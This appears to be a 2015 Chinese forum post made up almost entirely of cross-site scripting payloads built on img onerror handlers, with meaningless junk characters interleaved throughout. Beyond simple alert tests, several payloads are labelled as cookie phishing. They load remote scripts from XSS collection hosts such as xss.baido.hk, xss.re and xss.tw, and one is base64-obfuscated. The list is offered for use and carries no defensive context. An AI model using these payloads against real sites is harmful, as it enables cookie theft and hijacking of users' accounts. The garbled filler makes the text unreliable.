<img src='non-exist.jpg'onerror="alert('xss')">9 p1 D, }1 Z: H# V/ X
<img src=# onerror=alert(123)>
2 c: e5 n' ^. s2 |* n- j<img src=# onerror=alert(document.cookie)>
7 i2 V5 p3 b. h, A7 f* o! I下面是利用平台钓cookie的- k" M# {5 [# h8 ^* w& J. h: O
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>4 ]+ V! E& n+ j
* c- _/ ]4 O) S$ L- T3 x
4 s( o H8 f+ \. a' h) }2 c5 A<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
0 ~5 U. y g P& y<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>$ e1 e& `1 i# p" g6 n
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
" E. ?8 e, E& [$ O" ?" J<img src=1 onerror=jQuery.getScript("//xss.re/974")>
( r8 j) D3 a8 T) U5 Y8 g<img src="#">
. ~$ {0 E1 m9 e `( c; a<img src="#">$ }5 P: Q. x+ |4 v# B( O1 ?
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
* B0 n" {0 f" [. A7 _1 {! T& u<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">' |" F5 ~7 G, a: I9 u- d
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
1 `, L+ ^- p8 k<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)> Y3 D! s5 y- l2 H: o" K0 @) S
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
- o% {: W5 M6 m$ e<img src=x width="0" height="0"></img>! ?% A3 u" b7 T3 h9 K& f) H
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))> \% C' k5 g/ Z1 T9 h
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
" ~* j+ o& ]3 p3 c7 u' {6 K |
发表于 2015-10-18 14:33:54
收藏
支持
反对